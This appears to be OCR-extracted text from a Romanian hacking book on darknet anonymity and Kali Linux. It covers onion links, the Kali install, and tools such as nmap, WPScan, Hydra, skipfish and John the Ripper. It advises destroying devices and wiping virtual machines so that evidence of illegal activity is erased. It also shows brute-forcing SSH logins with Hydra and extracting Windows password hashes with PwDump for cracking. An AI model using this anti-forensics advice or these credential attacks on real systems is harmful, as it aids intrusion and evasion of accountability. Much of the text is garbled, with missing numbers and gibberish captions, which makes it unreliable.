Hidden Wiki: http://zqktlwi fecvo ri ceapă/'wiki/index php/Main Page Facebook: https://facebookcorewww i ceapă Versiunea internațională BBC: https://www bbcnewsv vjtpsuy omon Motor de căutare DuckDuckGo: https:// g upl pq kufc m omon Versiunile onion ale Facebook și BBC sunt folosite pentru a ocoli interzicerea accesului la aceste site-uri în țările în care sunt interzise Darknetul, pe lângă romantismul și spiritul de hacking și anonimat, este plin de amenințări Iată cele mai comune: • Fraudă - nu vă grăbiți să cumpărați nimic de pe darknet După ce a primit banii, persoana anonimă poate pur și simplu să nu-și îndeplinească obligațiile Nu îl vei pedepsi în niciun fel, deoarece este anonim și este aproape imposibil să-l dai seama Și dacă decizi să cumperi ceva de pe darknet, cel mai probabil este ceva ilegal și nu vei spune nimănui despre asta Pe asta se bazează escrocii • Conținut șoc - deoarece nu există cenzură pe dark web, este ușor să dai peste conținut care te va pune într-o stare de șoc Deosebit de impresionabil poate avea nevoie chiar de ajutorul unui psiholog Este mai bine să vă pregătiți pentru asta în avans - orice poate fi pe dark web • Acțiuni ale altor hackeri - să nu credeți că hackerii au un cod de onoare, ei bine, sau nu trebuie să vă clasificați ca hacker, doar dacă ați învățat să folosiți Tog Puteți fi pur și simplu piratat pentru a fura date personale, informații de plată etc Regulile sunt aceleași ca atunci când lucrați cu site-uri obișnuite - nu urmați linkuri necunoscute (și toate sunt necunoscute!) și nu deschideți fișiere suspecte Spre anonimatul deplin În sfârșit, încă câteva recomandări: Încercați să utilizați conexiuni anonime la Internet De exemplu, în unele țări puteți cumpăra carduri SIM fără pașaport Dacă vă aflați într-o astfel de țară, asigurați-vă că utilizați carduri anonime și nu contracte fixe Standardele moderne de comunicare G și în viitorul apropiat G vă permit să transferați date la o viteză destul de mare Cardurile, precum și dispozitivele de acces la rețea (smartphones), trebuie schimbate periodic Cu cât mai des, cu atât mai bine Trebuie să cumpărați carduri și smartphone-uri nu în magazinele oficiale, ci în piață Un dispozitiv G folosit nu merită Software-ul J atât de scump - de data asta Cu greu va exista pe piață o cameră care să înregistreze cine și când a cumpărat un smartphone și o cartelă SIM - acestea sunt două Cărți vechi - distruge Dispozitivele vechi - în mod ideal și ele, dar pot fi vândute cu precauție, mai bine manual și chiar mai bine - distruse Deci anonimizați accesul la rețea în sine Ai grijă să nu salvezi niciunul Informații suplimentare În mod ideal, implementați o mașină virtuală VMWare, instalați Windows în ea și chiar mai bine - Linux (nu colectează deloc informații inutile despre utilizator) Accesul la internet trebuie să se facă de la această mașină și să vă lăsați sistemul să rămână curat Dacă faceți ceva ilegal sau nu în întregime legal, ștergeți din când în când mașina virtuală și creați-o din nou Așadar, veți șterge informații care pot servi drept dovadă a vinovăției dvs În mod ideal, folosiți SSD - este mai dificil să recuperați informații de la ei Pentru HDD, utilizați utilități precum WipelInfo pentru a șterge definitiv informațiile În interiorul mașinii virtuale, utilizați Tor și chiar mai bun VPN + Tor pentru o protecție mai bună Creați o cutie poștală pe un serviciu anonim precum tuta io și utilizați el pentru corespondență Este recomandabil să schimbați din când în când cutiile poștale Nu utilizați mesagerie instantanee care folosesc un link către un număr de telefon Un exemplu de mesager care nu necesită un număr de telefon în timpul înregistrării este Wickr Me Folosiți parole diferite pentru viața normală și anonimă utilizator- Au un obicei prost de a folosi aceeași parolă pentru toate ocaziile Obiceiul este dăunător și se poate termina rău Decontarile in retea (plata pentru serviciile aceluiasi furnizor VPN) se fac exclusiv folosind strict Bitcoin - deci există șansa de a trece neobservat Este puțin probabil ca respectarea tuturor acestor reguli să vă facă munca pe Internet confortabilă Dar siguranța nu este niciodată confortabilă și acest lucru trebuie reținut G ii Capitolul Ce este Kaii Linux și cum să-l folosești pentru hacking Pe scurt despre Kaii Kaii Linux este o altă distribuție Linux Din punct de vedere tehnic, se bazează pe Debian, iar dacă ați mai lucrat cu Debian sau Ubuntu, atunci majoritatea cunoștințelor pot fi aplicate Kaii Lunux Distribuția Kaii este concepută pentru testare avansată (da, testare!) pentru auditul de penetrare și securitate Kaii conține câteva sute (mai mult de ) de instrumente axate pe diverse sarcini de securitate a informațiilor, cum ar fi testarea de penetrare (Test de penetrare), cercetarea securității (Cercetarea securității), criminalistica informatică (Computer Forensics) și inginerie inversă (Inginerie inversă) Distribuția Kaii Linux este dezvoltată, finanțată și susținută de Offensive Security, o companie lider în educația privind securitatea informațiilor Pe vremuri, distribuția BackTrack Linux a fost folosită în astfel de scopuri Kaii Linux este o continuare a acestei platforme Prima versiune de Kaii a fost lansată în martie Aceasta nu este doar o versiune actualizată a BackTrack Linux, ci o distribuție complet reproiectată, din care au fost eliminate toate instrumentele ineficiente, instrumente cu funcționalitate duplicat (adică Kaii nu va avea două instrumente de hacking WiFi și nu va trebui să faceți puzzle) peste care este mai bun), au adăugat programe noi și actuale Kaii Linux este în prezent dezvoltat activ Acest lucru se aplică atât infrastructurii proiectului, kit-ului de distribuție, cât și programelor "hacker" - acestea sunt actualizate constant, se adaugă noi pachete software de înaltă calitate În general, Kali este conceput pentru profesioniștii din domeniul testării de penetrare și auditului de securitate Au fost aduse multe modificări acestei distribuții pentru a reflecta aceste nevoi Această distribuție nu este recomandată utilizatorilor care nu știu nimic despre Linux - le va fi dificil și nu este potrivită pentru utilizarea desktopului - ca distribuție principală pentru fiecare zi Nu va avea o interfață grafică, nicio suită office etc De asemenea, trebuie să înțelegeți că Kali nu este tocmai OpenSource Echipa de dezvoltare este mică și este formată doar din persoane de încredere, pachetele din depozite sunt semnate atât de către committerul individual, cât și de către echipă, iar - important - setul de depozite din amonte din care sunt preluate actualizările și pachetele noi este foarte mic Adăugarea de depozite care nu au fost testate cu Kali la sursele software este o modalitate sigură de a avea probleme Cu alte cuvinte, cel mai bine este să folosiți Kali așa cum este și să nu încercați să adăugați noi surse de pachete la acesta Kali Linux este diferit de alte distribuții Linux și are, de asemenea, caracteristici specifice chiar și în comparație cu alte sisteme de operare "hacker" Luați în considerare caracteristicile acestei distribuții: • Conține peste de instrumente de testare a penetrației Citește asta: de instrumente pentru a pătrunde în sistem! Toate instrumentele sunt ținute la zi Au fost testate si functioneaza Noi instrumente puternice și acceptate pe scară largă sunt adăugate în mod regulat • Liber, a fost, este și va fi! Distribuția Kali Linux, precum BackTrack, este complet gratuită și va fi întotdeauna • Modul criminalistic Kali Linux Unul dintre modurile de pornire (Forensics) Excelent pentru colectarea de dovezi digitale În acest mod, Kali nu montează niciun disc (inclusiv swap) - nu puteți afecta accidental sistemul investigat Și un set bun de instrumente digitale criminalistice face din Kali o alegere bună pentru investigația digitală și munca de colectare a dovezilor • Serviciile de rețea sunt dezactivate implicit Kali Linux conține cârlige de sistem care dezactivează serviciile de rețea în mod implicit Acest lucru ne permite să instalăm diverse servicii pe Kali Linux, permițându-ne totodată să păstrăm distribuția implicită în siguranță, indiferent Khakipi prin exemple din pachetele instalate Serviciile suplimentare, cum ar fi Bluetooth, sunt, de asemenea, pe lista neagră în mod implicit • Nucleu Linux personalizat modern Distribuția Kaii Linux folosește versiuni moderne de kernel-uri patch-uri pentru injecție wireless • Set minim și verificat de surse de aplicații Conceptul cheie al Kaii Linux este menținerea integrității sistemului Din acest motiv, numărul de surse din care Kaii obține software este menținut la minimum Mulți oameni noi la Kaii sunt tentați să adauge noi depozite la sources list, ceea ce riscă să distrugă Kaii Linux • Un utilizator, acces rădăcină intenționat Datorită naturii auditurilor de securitate, Kaii Linux este proiectat pentru a fi utilizat în scenarii "single root" Multe instrumente utilizate în testarea de penetrare necesită privilegii ridicate Și în timp ce politicile adecvate permit ca privilegiile root să fie activate numai atunci când este necesar, în cazurile Kaii Linux această abordare ar fi greoaie • Suport pentru o gamă largă de dispozitive fără fir Suportul wireless este o problemă comună cu distribuțiile Linux Kaii Linux este construit pentru a suporta cât mai multe dispozitive wireless, acest lucru permite sistemului să funcționeze corect cu o varietate de hardware și îl face compatibil cu o gamă de dispozitive USB și alte dispozitive wireless • Suport pentru dispozitive ARM, inclusiv Android Kaii Linux poate rula pe RaspbenyPi și multe alte computere ARM Pentru ei au fost pregătite imagini speciale • Suport pentru criptarea sistemului Puteți crea stick USB Kaii Linux Live cu partiție criptată LUKS, criptare completă a discului, criptare a discului Raspbeny Pi datele vor fi complet inaccesibile Cu toate acestea, dacă ați făcut o copie de rezervă a cheilor, puteți restabili accesul la acele date mai târziu într-un mediu securizat • Kaii Linux Live USB cu mai multe partiții de stocare Un disc de pornire sau o unitate flash USB Kaii USB poate avea unul sau mai multe zu mai multe partiții pentru stocarea datelor, cu mai multe profiluri stocate Toate acceptă și criptarea Dezvoltat într-un mediu securizat Echipa Kaii Linux este un grup mic de indivizi Numai ei sunt de încredere pentru a lucra cu pachete și a interacționa cu depozitele, toată această muncă este efectuată folosind mai multe protocoale de securitate Pachete și depozite semnate GPG Fiecare pachet din Kaii Linux este semnat de fiecare dezvoltator individual care a creat commit-ul, depozitele semnând ulterior și pachetele Compatibil FHS Kaii aderă la standardul ierarhiei sistemului de fișiere, de exemplu "Standard pentru ierarhia sistemului de fișiere" Acest lucru permite utilizatorilor Linux să determine cu ușurință locația fișierelor binare, fișiere de suport, biblioteci și așa mai departe Kaii Linux Amazon EC AWS imagini Ce Linux este disponibil în cloud De exemplu, imagini cu Kaii Amazon EC Puteți configura cu ușurință Kaii Linux pe Amazon Elastic Compute Cloud dacă aveți nevoie de o conexiune serioasă de lățime de bandă, spațiu pe disc sau un GPU puternic Notă Cum să începi să studiezi securitatea informațiilor? În cazul în care vă gândiți serios să faceți acest lucru, nu tot ce vă interesează este cum să spargeți Wi-Fi-ul vecinului pentru a nu plăti pentru internet! A vorbi despre învățarea Kaii Linux înseamnă de obicei lucrul cu programe Deși sistemul de operare Kaii Linux are și multe întrebări de studiat (crearea unui ISO personalizat, instalarea pe medii amovibile, criptarea partițiilor permanente și multe altele), puteți utiliza sistemul în siguranță chiar și fără a le înțelege Prin urmare, aceste întrebări sunt relegate în plan secund În primul rând, hackerii începători sunt interesați să lucreze cu instrumente Va fi mult mai ușor să lucrați cu instrumentele dacă aveți experiență și cunoștințe în administrarea sistemului Linux, înțelegerea "materialului" (cunoașterea aspectelor tehnice ale tehnologiilor IT) și cunoașterea unuia sau mai multor limbaje de programare Cu cât mai multe cunoștințe despre aceste probleme, cu atât mai bine Cu toate acestea, este posibil să începem de la zero absolut - mai târziu în acest capitol vom oferi câteva exemple despre ceea ce se poate face la pornirea în Kaii Linux pentru prima dată gnya Unde să descărcați și cum să instalați Kali Linux Trebuie doar să descărcați Kali Linux de pe site-ul oficial Nu utilizați versiuni postate în altă parte Setul de distribuție este complet gratuit și nu este nevoie să îl descărcați în altă parte Rețineți că versiunea neoficială poate fi modificată Care sunt cunoscute doar de autorul adunării Dacă intenționați să instalați Kali Linux într-o mașină virtuală, acordați atenție imaginilor gata făcute: https /www offensive-security com/kali-linux-vmware-virtualbox-image-download/ Aceste imagini sunt foarte puternice, deoarece vă permit să încercați și chiar să utilizați Kali Linux fără a fi nevoie să îl instalați pe un computer fizic Cu toate acestea, pot exista versiuni destul de învechite, așa că vă recomandăm să descărcați un ISO obișnuit Imaginile ISO pot fi folosite ca sisteme Live și pot fi instalate și de pe acestea Aceste imagini pot fi descărcate de pe pagina: https://www kali org/descărcări/ Următoarele vor arăta cum să descărcați o imagine ISO și să creați o mașină virtuală VMWare în care vom instala Kali Linux Deci, accesați https://www kali org/downloads/ și descărcați una dintre imagini: • Kali Linux -bit (Installer) - instalator Potrivit dacă doriți să instalați imediat sistemul pe un computer fizic sau virtual Descărcați exact această imagine - până la urmă, vrem să o instalăm pentru utilizare permanentă • Kali Linux -bit (Live) - o imagine "în direct" care vă permite să încercați sistemul fără a-l instala pe computer Aceeași imagine este potrivită pentru instalare pe USB folosind Rufus: trebuie doar să conectați o unitate flash goală de GB sau mai mult la computer, să rulați Rufus și să creați o unitate flash bootabilă De acolo, puteți porni și utiliza Kali Linux imediat • Kali Linux -bit (Netlnstaller) - instalator de rețea pentru instalarea sistemului în rețea Atenție - coloana din stânga (prima) conține o legătură directă către imaginea ISO Coloana Torrent conține un link către un fișier Torrent Pentru a descărca imaginea prin Torrent, veți avea nevoie de un client Torrent Puteți folosi uTorrent sau oricare altul Pic Selectarea imaginii După descărcarea imaginii, lansați VMWare Workstation, selectați Fișier, Mașină virtuală nouă În fereastra care apare, faceți clic pe Următorul de două ori până când vedeți selecția sistemului de operare Care Linux nu va fi în listă, trebuie să selectați Ubuntu pe de biți (Fig ) Introduceți numele mașinii virtuale și selectați locația acesteia Trebuie să existe suficient spațiu liber pe discul selectat (Fig ) Noua mașină virtuală Expert Setați un sistem de opera GUetft Ce sistem de operare va fi mințit pe rnachtne virtual? 'u't oparvOng ț, Man- OmyuyaoL Wkxlows O Nor, B NetWare QSotans Despre VMware ES Au* yerston Ubuntu -blt Ner Canoe' Pic Selectarea tipului de sistem de operare Pic Numele mașinii virtuale și locația acesteia Următorul pas este să selectați dimensiunea discului virtual Nu este necesar să setați dimensiunea prea mare - pur și simplu nu va fi la îndemână GB vor fi de ajuns După aceea, trebuie să faceți clic pe butonul Personalizare hardware (Fig ) În mod implicit, o mașină virtuală este creată cu parametri foarte modesti - procesor și GB RAM Acest lucru nu va fi suficient Orez Dimensiunea discului virtual Noua mașină virtuală Expert X Itody toCreata Wtual toaOWva Ajutorul Termină pentru a crea nebuna virtuală Apoi, puteți distribui Ubuntu -brt Machirve-ul virtual va fi creat cu următoarele caracteristici: saaboryuzh locuri pentru a crea but'ai distribuite sau un dispozitiv pentru a crea un tabel nou pe acesta Aspect automat Configurarea software-ului RAJO Configurarea Logical Volume Manager (IVM) Configurați criptarea volumelor Configurați volume iSCSI • despre SCSI ( , (eba) , CB VMware, VMware Virtual S " " primar CB f *t / > * ore logice CB f plumb barcă | Anulați modificările partiției Veriutsi Continuare Orez Marcajul este gata, faceți clic pe butonul "Continuare" Nu la im usgroysgvzhs tabelele de partiții au fost schimbate: SCSI ( ) (sde) Următoarele partiții vor fi formatate: partiția # pe un dispozitiv SCSI ( ) (sda) ca "partiție xt " pe un dispozitiv SCSI ( ) (sde) ca derulare Zotieat mkhmenenmya nashkk? Orez Alegeți "Da" După aceea, va începe instalarea sistemului După instalarea sistemului de bază, vi se va solicita să selectați software-ul de instalat Pentru moment, puteți lăsa totul ca implicit în siguranță (Figura ) Nu trebuie să instalați GNOME și KDE "grele", mediul Xfce ușor va fi suficient După următorul clic pe butonul, al cărui nume nici măcar nu doriți să-l pronunți, trebuie să așteptați puțin până când software-ul selectat este instalat KALI Zhtanovka w noyanyash (gurai naaaroa Orez Sistem în derulare Odată ce pachetele au fost copiate, programul de instalare vă va întreba dacă trebuie să instalați bootloader-ul GRUB Desigur, pentru că fără ea sistemul nu va putea Chimie asupra masurilor lipii cizma (Fig )! De asemenea, trebuie să specificați unde exact să instalați bootloader-ul - pe un singur dispozitiv (Fig ) Selectarea software-ului Li moment, numai celula de la pupa f le Instailed Selecțiile implicite de mai jos vor instala Kaii Linux cu mediul său desktop standard și instrumentele implicite Îl puteți personaliza alegând un alt sistem desktop sau o colecție diferită de instrumente Alegeți software-ul de instalat: Continua Pic Selectarea pachetelor în timpul instalării Instalați bootloader-ul GRUB Se pare că această nouă instalație este singurul sistem de strigăt de pe acest computer Dacă da, ar trebui să fie sigur să instalați încărcătorul de pornire GRUB pe unitatea dumneavoastră principală (partiția UEFl/înregistrarea de pornire) Avertisment: Dacă computerul dvs are alt sistem de operare pe care instalatorul nu l-a detectat acest lucru va face ca sistemul de operare să nu poată porni temporar deși GRUB poate fi configurat manual ulterior pentru a-l porni Instalați încărcătorul de pornire GRUB pe unitatea dvs proprie? Despre ea $ Da Instantaneu cu o gorilă Înapoi D Continuă" Orez Trebuie să instalez un bootloader? VOM AMd bmgyayya, bw ip"oLipd 'h" GRU" bwt l"ed"r Din "b^ebl* dwicM ThtuM^ *■" lodoIhlelitolnwlWI GRUi (oyavr prht"y rt""tUEFl partftftarvboot r"c /etc/ap't/sources list Această comandă va suprascrie complet fișierul /etc/apt/sources list și va adăuga o linie acolo După actualizarea depozitelor, tastați această comandă - va actualiza datele despre pachetele disponibile în depozite: sudo apt-get update Dacă nu ați schimbat nimic de la instalarea distribuției, trebuie doar să tastați sudo apt-get update pentru a actualiza lista de pachete Eroare "Discul conține un sistem de fișiere necurat ( , ) Metadatele păstrate în cache-ul Windows, au refuzat montarea" Când încercați să montați o partiție Windows, este posibil să primiți mesajul de eroare de mai sus În primul rând, trebuie să determinați numele discului cu probleme, pentru a face acest lucru, introduceți comanda fdisk- Specificați un nume de secțiune De obicei, unitatea C: este prima partiție de pe unitate (deși pot exista excepții) și se numește /dev/sdal Transmite acest nume la comanda ntfsfix: sudo ntfsfix /dev/sdal După aceea, puteți încerca să montați sistemul de fișiere din nou cu comanda: sudo mount /dev/sdal /mnt/disc c Curățare regulată a sistemului Din când în când, este recomandat să rulați comenzi pentru a elimina pachetele care au fost instalate automat (pentru că erau dependențe ale altor programe), dar nu mai sunt necesare Pentru aceasta se folosește comanda: sudo apt-get autoremove -u Utilizarea sa este sigură și nu ar trebui să ducă la probleme De fiecare dată când software-ul este actualizat, fișierele pachetului sunt descărcate în cache După actualizare, fișierele descărcate (le puteți numi fișiere de instalare) nu sunt șterse și, treptat, memoria cache crește la dimensiuni mari Acest lucru se face intenționat cu ideea că, dacă după următoarea actualizare s-a constatat că noul pachet are probleme, iar versiunea veche nu mai este disponibilă în depozitul online, atunci puteți reveni la versiunea veche instalând-o dintr-un fișier salvat în cache Pentru distribuțiile rulante, memoria cache crește foarte repede, iar dacă nu ești suficient de calificat pentru a reveni la versiunea veche, atunci pentru tine aceste sute de megaocteți sau chiar câțiva gigaocteți sunt spațiu irosit pe hard disk Prin urmare, din când în când puteți rula comenzile: sudo apt-get autoclean -y sudo apt-get clean -y Comanda clean elimină fișierele de arhivă descărcate Curăță depozitul local din fișierele pachetelor primite Îndepărtează totul, cu excepția fișierului de blocare din /var/cache/apt/archives/ și /var/cache/apt/archives/partial/ Comanda autoclean elimină fișierele vechi de arhivă descărcate La fel ca clean, autoclean curăță fișierele pachetelor descărcate din depozitul local Singura diferență este că elimină doar fișierele pachet care nu mai pot fi descărcate și sunt aproape inutile Acest lucru permite păstrarea memoriei cache pentru o perioadă lungă de timp, fără a crește prea mult Următoarea comandă nu este direct legată de curățare, dar ajută la menținerea sănătății sistemului sudo apt-get install -f -y Opțiunea -/ fix-broken remediază, încearcă să repare un sistem cu dependențe rupte Această opțiune, atunci când este utilizată cu instalarea/eliminarea, poate sări peste orice pachet pentru a permite APT să găsească o soluție plauzibilă Dacă pachetele sunt listate, aceasta ar trebui să rezolve complet problema Această opțiune este uneori necesară când rulați APT pentru prima dată; APT în sine nu permite pachetelor cu dependențe rupte să existe pe sistem Este posibil ca structura de dependență a sistemului să fie atât de distrusă încât să fie necesară intervenția manuală (ceea ce înseamnă, de obicei, utilizarea dpkg -getoe pentru a elimina unele dintre pachetele ofensatoare) Utilizarea acestei opțiuni cu -t poate provoca o eroare în unele situații g Setarea parolei de root Conectați-vă ca root În cele mai recente versiuni de Kaii, se pare, dezvoltatorii au decis să se îndepărteze de conceptul de un singur utilizator Oricum, parola utilizatorului root nu este solicitată nici când sistemul este instalat Acum o vom repara Deschideți un terminal și introduceți comenzile: sudo bash passwd root Prima comandă pornește bash ca root Introduceți parola specificată în timpul instalării Apropo, după ce intri în sudo bash, obții drepturi maxime și, de fapt, nu ai nevoie de root Dar totuși, îi vom schimba parola cu a doua comandă, astfel încât să ne putem conecta ca root imediat la sistem Apoi deconectați-vă din sistem și în fereastra de introducere a numelui de utilizator și a parolei introduceți numele rădăcină și parola setată După aceea, apăsați butonul de autentificare (ultimul buton de pe bara de instrumente din colțul din dreapta sus), va apărea o fereastră în care, pe lângă orice butoane, este raportat și numele de utilizator Dacă vedeți root (vezi Figura ), atunci ați făcut totul corect Orez Schimbarea parolei root Hackn pe exemple Orez Conectat ca root O prezentare generală a celor mai bune instrumente Kaii Linux După cum sa menționat deja, Kaii Linux include peste de instrumente pentru hacking și analiză de securitate O discuție despre toate aceste instrumente depășește scopul acestei cărți, deoarece atunci ar fi necesar să scrieți o carte pe Kaii Linux În acest capitol, vom trece în revistă douăzeci dintre cele mai bune instrumente Desigur, sunteți interesat, așa că iată un link către documentația pentru toate instrumentele: https://tois kali org/tools-listing WPScan WordPress este unul dintre cele mai bune CMS open source, este gratuit, există multe extensii pentru el, ceea ce l-a făcut foarte popular Pe baza WordPress, se realizează o mare varietate de site-uri - site-uri de cărți de vizită, bloguri și chiar magazine online Notă Dacă sunteți complet nou, atunci CMS (Content Management System) este un sistem de management al conținutului Ea este cea care permite utilizatorului (administratorul de resurse) să formeze conținutul paginilor site-ului (acest lucru se face în panoul de administrare), iar apoi afișează acest conținut într-un design (temă) dat Instrumentul WPScan vă permite să verificați WordPress pentru vulnerabilități În plus, oferă și informații detaliate despre pluginurile active Un blog bine protejat nu va oferi prea multe informații, dar puteți încerca totuși Orez Ajutor instrument În cel mai simplu caz, utilizarea instrumentului arată astfel: wpscan uri site address Nu veți pirata blogul imediat, dar veți primi informații despre vulnerabilitățile sale pe care le puteți folosi De asemenea, vor fi disponibile tot felul de informații despre sistem, cum ar fi versiunea PHP, vezi fig Orez Rezultatul accesării cu crawlere a site-ului Hakish cu exemple nmap Scanerul de rețea Nmap a fost, este și va fi cel mai popular scaner de rețea Este atât de popular încât a apărut în Matrix și în alte filme Dacă hackerii pirata ceva, atunci pur și simplu rulează nmap, care generează o mulțime de rezultate De fapt, nmap este un instrument foarte important pentru furnizarea de informații despre o gazdă la distanță Pe fig Figura arată serviciile care rulează pe gazda la distanță Orez Servicii care rulează pe gazda la distanță Dacă aveți nevoie de un raport detaliat, atunci utilizați opțiunile -T -A -v - aceasta este așa-numita scanare intensivă (Fig ), în urma căreia sunt furnizate mai multe informații, de exemplu, a devenit imediat clar să cu ochiul liber că nu scanăm un computer fizic, ci un VPS de la Masterhost Orez Scanare intensivă Uită-te la fig Din aceasta devine clar că: • pe al -lea port "se blochează" SSH rulând Ubuntu • Serverul web Apache rulează pe porturile , , , depozitul Git al Bagzilla rulează pe portul • SimpleHTTPServer de la Python rulează pe portul Orez Rezultatul scanării După cum puteți vedea, o mulțime de informații au devenit disponibile după scanare De exemplu, nu ați putut ghici despre porturile deschise , , și că există ceva acolo! Apoi aceste porturi pot fi scanate de alte utilitare - evident, site-urile "atârnă" de ele Trebuie să determinați ce CMS este utilizat Dacă există WordPress, poți încerca să-l scanezi cu WPScan, dacă celălalt este Skipfish Trebuie să încercați să determinați tipul de CMS și versiunea acestuia Mai departe, în rețea, trebuie să găsiți informații despre vulnerabilități dintr-un anumit CMS Lynis Lynis este un instrument puternic pentru auditarea securității, testarea conformității și protecția sistemului Desigur, îl puteți folosi și pentru detectarea vulnerabilităților și testarea de penetrare Acesta va scana sistemul în funcție de componentele detectate De exemplu, dacă detectează Apache, va rula teste legate de Apache pentru a obține informații despre punctele sale slabe Hacking cu exemple Acest instrument nu este instalat implicit Pentru a-l instala, trebuie să introduceți comanda apt-get install lynis Orez Instalarea lynis Pentru a începe auditarea unui sistem la distanță, introduceți comanda: lynis audit system adresa IP de la distanță aircrack-ng Aircrack-ng este un set de instrumente pentru evaluarea securității unei rețele WiFi Nu se limitează doar la monitorizarea și preluarea informațiilor, ci include și posibilitatea de hacking în rețea (WEP, WPA și WPA ) Dacă ați uitat parola propriei rețele WiFi, puteți încerca să o utilizați pentru a restabili accesul Include, de asemenea, diverse atacuri wireless prin care un hacker poate viza/monitoriza o rețea WiFi pentru a-i crește securitatea Acest instrument va fi descris în detaliu în Capitolul Hidra Dacă sunteți în căutarea unui instrument interesant pentru a sparge o pereche nume de utilizator/parolă, Hydra este unul dintre cele mai bune instrumente Kali Linux preinstalate Capitolul Orez Acesta este un program real pentru hacking login/parola Imaginați-vă că există un nod , SSH se rotește pe el, așa cum am aflat din rezultatul nmap Să încercăm să o spargem: hydra - logins txt -p pass txt ssh Orez Hidra în acțiune Ne pare rău, nu s-au găsit parole Trebuie să generați (sau să găsiți undeva) fișierele logins txt și pass txt - Hydra va căuta în ele nume de utilizator și parole, pe care le va "alimenta" serverului SSH care rulează la Wireshark Wireshark este cel mai popular analizor de rețea care vine cu Kaii Linux De asemenea, poate fi catalogat drept cel mai bun instrument de analiză a rețelei Kaii Linux Este întreținut activ, așa că vă recomand cu siguranță să îl încercați Cadrul Metasploit Cadrul Metsploit este cel mai des folosit cadru de testare a penetrației Oferă două ediții - una (open source) și a doua este o versiune profesională Cu acest instrument, puteți verifica vulnerabilitățile, puteți testa exploit-urile cunoscute și puteți efectua o evaluare completă a securității Desigur, versiunea gratuită nu va avea toate caracteristicile, așa că dacă comparați cele două ediții, versiunea pro ar putea fi exact ceea ce aveți nevoie Despre acest instrument vom vorbi în detaliu în capitolul următor skipfish Similar cu WPScan, dar nu doar pentru WordPress Skipfish este un scaner de aplicații web care vă va oferi informații despre aproape fiecare tip de aplicație web Este rapid și ușor de utilizat De asemenea, metoda sa de scanare recursivă îl face și mai bun Pentru evaluările profesionale de securitate a aplicațiilor web, raportul generat de Skipfish este util Puteți utiliza informațiile despre vulnerabilități primite de la scaner pentru a pirata sistemele Să încercăm să folosim instrumentul în practică Pentru a începe, trebuie să treceți cel puțin două opțiuni - directorul rezultat în care vor fi plasate rezultatele scanării, precum și adresa URL a site-ului Mai întâi trebuie să specificați opțiunea și apoi numele site-ului, altfel programul nu va înțelege succesiunea opțiunilor: skipfish -o /root/skipfish I J În continuare (Fig ), programul va afișa un memento pentru utilizator: Puteți întrerupe scanarea în orice moment apăsând Ctrl + C, raportul parțial va fi scris în locația specificată de dvs Pentru a vizualiza o listă de adrese URL accesate cu crawlere, apăsați oricând pe Space timpul de scanare Vizualizați numărul de solicitări pe secundă pe ecranul principal Dacă este mai mică de , scanarea va dura mult timp Pe fig este în prezent solicitări pe secundă Acesta este foarte mic, scanarea va dura mult timp Noi versiuni ale scanerului sunt lansate în fiecare lună, nu uitați să actualizați sistemul pentru a le primi (puteți actualiza nu întregul sistem, ci doar pachetul scanerului) Orez Notă Skipfish Orez Scanare în curs " Dacă accesați site-ul în mod legal și aveți acces la el, conectați-vă prin ssh și verificați încărcarea serverului (comanda htop) Dacă sarcina este mare, aceasta indică următoarele: • Poate doriți să opriți testarea și să repetați în afara programului de lucru În caz contrar, există șansa de a "da jos" site-ul și utilizatorii obișnuiți nu vor putea primi serviciile oferite de acesta (acest lucru este deosebit de critic pentru magazinele online) • Acesta este un semn clar că lipsesc resurse și trebuie adăugate Imaginează-ți că nu tu ești cel care începe scanarea, ci altcineva Dacă skipfish "da jos" site-ul, atunci trebuie să ridicați în mod explicit resursele - numărul procesoare și RAM Orez Utilizarea resurselor în timpul unei scanări Trebuie remarcat faptul că skipfish funcționează destul de corect în mod implicit (cu excepția cazului în care se specifică altfel în opțiuni) și administratorul acelui site nici măcar nu va observa faptul că scanează, deoarece încărcarea pe server ar trebui să fie în limitele normale Dacă v-ați săturat să așteptați, puteți opri oricând scanarea site-ului apăsând Ctrl + C În fig arată că scanarea a fost doar întreruptă de utilizator După aceea, deschideți managerul de fișiere și mergeți la directorul cu rezultatele (în cazul nostru este /root/skipfish) Deschideți fișierul index html, acesta va conține un raport cu rezultatele scanării Pe fig arată că Skipfish eu J a găsit vulnerabilități, în ciuda faptului că scanarea a fost întreruptă mai devreme Deschideți nodurile paginii și familiarizați-vă cu conținutul raportului - atunci veți înțelege ce vector de atac să alegeți pentru a pirata site-ul Orez Scanare întreruptă de utilizator Prezentare generală a tipului de document - faceți clic pentru a extinde: applK"tion/)"ve*script textfptten Prezentare generală a tipului de problemă - faceți clic pentru a extinde: O Interogare tnjwcwwi vector -i W SM tafsction wctor l O Mnrastng mgv " hash txt t(r)p\pwduap PwDump exe > hazn txt Pwduep i raw password extractor Puthor Andree Tarasco ftcuna uri http //yyy os c \tap\pwduwp dir Volumul din dispozitivul C nu este etichetat Volum Serial Number* CADF-EAEG Conținut de picior cu : \tmp\pMduap? : DÎFb : : USD hesh txt a a libeay ,dU OG a PwDump? eke - readwe txt fișiere a &a octeți foldere St a a $ octeți eoooodng cu tmp\pwduep Orez Exportați hash-uri pentru parole Aceasta va exporta hash-urile parolei în fișierul hash txt Dacă deschideți acest fișier, atunci conținutul său va fi cam așa: @: :FĂRĂ PAROLĂ D AE B C D E C C ::: **********: D CFE >ABL: :N PAROLA*************************:NU PAROLA*************************:: : : :FĂRĂ PAROLĂ*************************: DBDE D A BEB ::: HomeGroupUser$: :FĂRĂ PAROLĂ*************************:A F A D BA A B F ::: Conținutul specific depinde de computerul dvs Acum, acest fișier trebuie să fie transmis instrumentului John the Ripper Introdu comanda: john hash txt Cel mai interesant lucru este că pentru parolele Windows este de dorit să folosiți opțiunile format=LM sau format=NT Dar când a folosit aceste opțiuni, instrumentul nu a făcut față sarcinii, dar fără aceste opțiuni, a reușit Pe fig Figura arată că există un utilizator cu numele și parola Există și un utilizator cu un nume de neînțeles, cel mai probabil PwDumpî nu a putut face față numelui de utilizator rusesc Acest utilizator cu un nume de neînțeles nu are deloc o parolă Orez ieșire instrument John Nu vă faceți griji dacă utilizatorii dvs folosesc parole în limba rusă - acestea vor fi decriptate corect Doar că john acceptă în mod normal UTF- și funcționează cu hash-ul parolei, iar hash-ul conține doar caractere englezești, iar programul PwDumpî nu va putea să se încurce cu codificarea hash G Dacă sunt mulți utilizatori, poate fi necesar să ghiciți parole - încercați în ordine până vă conectați Dar veți cunoaște parolele tuturor utilizatorilor! L Wireshark - captare trafic Wireshark este un analizor de pachete de rețea Un analizor de pachete de rețea care captează pachete de rețea și încearcă să afișeze pachetele de date cât mai detaliat posibil Dacă sunteți interesat de ceea ce se întâmplă în rețeaua dvs , ca să spunem așa, la 